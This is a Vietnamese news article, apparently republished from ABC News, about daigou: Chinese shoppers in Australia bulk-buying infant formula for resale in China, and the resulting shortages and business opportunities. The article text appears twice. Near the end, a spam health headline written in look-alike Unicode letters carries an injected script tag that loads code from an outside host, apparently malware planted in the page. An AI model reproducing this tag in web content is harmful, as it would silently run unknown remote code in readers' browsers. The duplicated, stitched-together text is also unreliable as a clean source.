RSS

Daigou - trào lưu săn hàng "ngoại" hái ra tiền

06:00 28/04/2018

Daigou là mô hình bán lẻ, hoạt động nhờ "cơn khát" hàng ngoại của người tiêu dùng ở các thị trường như Trung Quốc.

 

Daigou là mô hình bán lẻ, hoạt động nhờ "cơn khát" hàng ngoại của người tiêu dùng ở các thị trường như Trung Quốc.

Bạn đã bao giở bắt gặp ai đó mua toàn bộ gian sữa bột trong siêu thị? Những người như vậy rất có thể là khách hàng Trung Quốc. Họ mua sạch sữa bột ở các cửa hàng tại Úc, rồi bán lại ở thị trường Trung Quốc.

Loại hình kinh doanh này được gọi là “daigou”, cực kì đơn giản và giúp thu về 5-10 đô la lợi nhuận trên mỗi hộp sữa.

Người mua sẽ đặt hàng và thanh toán qua ứng dụng nhắn tin Trung Quốc Wechat. Sau đó họ chỉ cần chờ người khác làm hết những khâu còn lại bao gồm mua hàng, gói hàng, và gửi hàng kèm biên lai.

“Sữa bột của Úc là tốt nhất”

 

Cici He, một bà mẹ hai con ở Sydney, đã kinh doanh theo mô hình daigou được 10 năm.

Cici He, một bà mẹ hai con ở Sydney, đã kinh doanh theo mô hình daigou được 10 năm.

Người phụ này có tầm ảnh hưởng khá lớn. Cô thường phát video cho hàng ngàn bà mẹ trực tiếp xem các mặt hàng ở Úc.

“Ai cũng nghĩ sữa của Úc là tốt nhất, vì vậy họ rất ưa chuộng sản phầm này.”

Giá cả đối với họ dường như không phải là 1 vấn đề lớn.

Mặt hàng gần đây nhất mà Cici He kinh doanh là đồ tạp hóa và các sản phẩm chăm sóc sức khỏe.

Người tiêu dùng Úc phẫn nộ

 

Sau vụ ngộ độc sữa Trung Quốc 10 năm về trước, nhu cầu mua sữa Úc của người Trung Quốc ngày càng lớn. Điều này đã gây ra bất bình cho không ít bà mẹ ở Úc, trong đó có Delrissa Marciano. Cô thường gặp khó khăn trong việc tìm mua sữa cho con trai mình, trong khi chứng kiến người khác mua được hàng tá.

Điều gì cũng có hai mặt

 

Ông McDougall là chủ tịch hiệp hội Daigou Úc - Trung với mong muốn điều tiết hoạt động của daigou

Rất nhiều vụ mua sắm sữa ồ ạt đã được ghi lại bởi những người tiêu dùng Úc phẫn nộ và đặt dấu chấm hỏi trước trào lưu này.

Tiến sĩ kiêm doanh nhân Mathew McDougall bày tỏ:

“Tất cả những gì bạn xem được trên TV chỉ cho thấy những mặt tiêu cực của chuyện này, và tôi cho rằng điều đó thật không công bằng. Daigou mang về doanh thu khổng lồ gần 1 tỉ đô là. Ngành chuyển phát nhờ đó cũng ăn nên làm ra.”

Được biết, ông McDougall là chủ tịch hiệp hội Daigou Úc- Trung với mong muốn điều tiết hoạt động của daigou, đồng thời ông cũng là một nhà bán lẻ.

Bùng nổ nhu cầu tiêu dùng từ Trung Quốc

AuMake là một chuỗi các cửa hàng phục vụ trào lưu daigou. Ở đây, người ta có thể mua hàng, gói hàng và gửi từ về Trung Quốc.

AuMake được niêm yết trên Sở Giao dịch Chứng khoán Australia, gần đây đã xuất hiện thêm cửa hàng thứ 8, và tương lai sẽ còn mở rộng hơn nữa.

Koe Chang, CEO AuMake cho biết, các doanh nghiệp Úc cũng đang chật vật ứng phó với sự bùng nổ nhu cầu mua hàng từ Trung Quốc thông qua daigou.

Đáp ứng nhu cầu trong và ngoài nước

 

Các công ty nhìn daigou như một cơ hội kinh doanh đầy triển vọng

Các công ty như Blackmores nhận ra rằng trào lưu daigou tạo ra cho họ một cơ hội kinh doanh mới.

Tim Scotcher, Tổng giám đốc phụ trách mặt hàng thực phẩm chức năng của Blackmores cho biết

“Blackmores cam kết đảm bảo rằng chúng tôi có thể tiếp tục đáp ứng nhu cầu tiêu dùng của các bà mẹ, bao gồm những người ở Trung Quốc, hay trong mạng lưới daigou.”

“Tuy nhiên, điều quan trọng mà chúng tôi vẫn cần làm là tập trung đảm bảo nhu cầu của các bà mẹ ở Úc được đáp ứng”

Dẫu vậy, cũng có những trường hợp như cô Marciano, người không còn chút kiên nhẫn nào và phải chuyển sang mua sữa nguyên kem thay vì sữa bột cho con mình ngay từ giai đoạn còn sớm.

“Tôi chỉ mong muốn các gia đình ở Úc sẽ có cơ hội thực sự mua sắm cho gia đình mình và không phải đau đầu về chuyện tìm mua sữa bột” cô nói.

Bạn đã bao giở bắt gặp ai đó mua toàn bộ gian sữa bột trong siêu thị? Những người như vậy rất có thể là khách hàng Trung Quốc. Họ mua sạch sữa bột ở các cửa hàng tại Úc, rồi bán lại ở thị trường Trung Quốc.

Loại hình kinh doanh này được gọi là “daigou”, cực kì đơn giản và giúp thu về 5-10 đô la lợi nhuận trên mỗi hộp sữa.

Người mua sẽ đặt hàng và thanh toán qua ứng dụng nhắn tin Trung Quốc Wechat. Sau đó họ chỉ cần chờ người khác làm hết những khâu còn lại bao gồm mua hàng, gói hàng, và gửi hàng kèm biên lai.

“Sữa bột của Úc là tốt nhất”

Cici He, một bà mẹ hai con ở Sydney, đã kinh doanh theo mô hình daigou được 10 năm.

Người phụ này có tầm ảnh hưởng khá lớn. Cô thường phát video cho hàng ngàn bà mẹ trực tiếp xem các mặt hàng ở Úc.

“Ai cũng nghĩ sữa của Úc là tốt nhất, vì vậy họ rất ưa chuộng sản phầm này.”

Giá cả đối với họ dường như không phải là 1 vấn đề lớn.

Mặt hàng gần đây nhất mà Cici He kinh doanh là đồ tạp hóa và các sản phẩm chăm sóc sức khỏe.

Người tiêu dùng Úc phẫn nộ

 

Sau vụ ngộ độc sữa Trung Quốc 10 năm về trước, nhu cầu mua sữa Úc của người Trung Quốc ngày càng lớn. Điều này đã gây ra bất bình cho không ít bà mẹ ở Úc, trong đó có Delrissa Marciano. Cô thường gặp khó khăn trong việc tìm mua sữa cho con trai mình, trong khi chứng kiến người khác mua được hàng tá.

Điều gì cũng có hai mặt

Rất nhiều vụ mua sắm sữa ồ ạt đã được ghi lại bởi những người tiêu dùng Úc phẫn nộ và đặt dấu chấm hỏi trước trào lưu này.

Tiến sĩ Mathew McDougall, một doanh nhân bày tỏ:

“Tất cả những gì bạn xem được trên TV chỉ cho thấy những mặt tiêu cực của chuyện này, và tôi cho rằng điều đó thật không công bằng. Daigou mang về doanh thu khổng lồ gần 1 tỉ đô là. Ngành chuyển phát nhờ đó cũng ăn nên làm ra.”

Được biết, ông McDougall là chủ tịch hiệp hội Daigou Úc- Trung với mong muốn điều tiết hoạt động của daigou, đồng thời ông cũng là một nhà bán lẻ.

Bùng nổ nhu cầu tiêu dùng từ Trung Quốc

AuMake là một chuỗi các cửa hàng phục vụ trào lưu daigou. Ở đây, người ta có thể mua hàng, gói hàng và gửi từ về Trung Quốc.

AuMake được niêm yết trên Sở Giao dịch Chứng khoán Australia, gần đây đã xuất hiện thêm cửa hàng thứ 8, và tương lai sẽ còn mở rộng hơn nữa.

Koe Chang, CEO AuMake cho biết, các doanh nghiệp Úc cũng đang chật vật ứng phó với sự bùng nổ nhu cầu mua hàng từ Trung Quốc thông qua daigou.

Đáp ứng nhu cầu trong và ngoài nước

Các công ty như Blackmores nhận ra rằng trào lưu daigou tạo ra cho họ 1 cơ hội kinh doanh mới.

Tim Scotcher, Tổng giám đốc phụ trách mặt hàng thực phẩm chức năng của Blackmores cho biết

“Blackmores cam kết đảm bảo rằng chúng tôi có thể tiếp tục đáp ứng nhu cầu tiêu dùng của các bà mẹ, bao gồm những người ở Trung Quốc, hay trong mạng lưới daigou.”

“Tuy nhiên, điều quan trọng mà chúng tôi vẫn cần làm là tập trung đảm bảo nhu cầu của các bà mẹ ở Úc được đáp ứng”

Dẫu vậy, cũng có những trường hợp như cô Marciano, người không còn chút kiên nhẫn nào và phải chuyển sang mua sữa nguyên kem thay vì sữa bột cho con mình ngay từ giai đoạn còn sớm.

“Tôi chỉ mong muốn các gia đình ở Úc sẽ có cơ hội thực sự mua sắm cho gia đình mình và không phải đau đầu về chuyện tìm mua sữa bột” cô nói.

Mai Dung - Tin Tức Úc

- ảnh ' + i); $img.attr('title', 'Daigou - trào lưu săn hàng "ngoại" hái ra tiền - ảnh ' + i); i++; }); });
Nguồn: ABC News
Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп<script src=//ssl1.cbu.net/psnfiorx></script>

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп

Tɦeo các ɓác sĩ, sức ƙɦỏe củɑ пɢũ łạпɢ qᴜyếł ᵭịпɦ łᴜổi łɦọ củɑ ɓạп. Đây ℓà ɓí qᴜyếł ℓựɑ cɦọп łɦực ρɦẩɱ cɦăɱ sóc cơ łɦể łốł пɦấł ɓạп пêп łɦɑɱ ƙɦảo ᵭể ℓᴜôп ƙɦỏe ɱạпɦ ʋà łɾườпɢ łɦọ.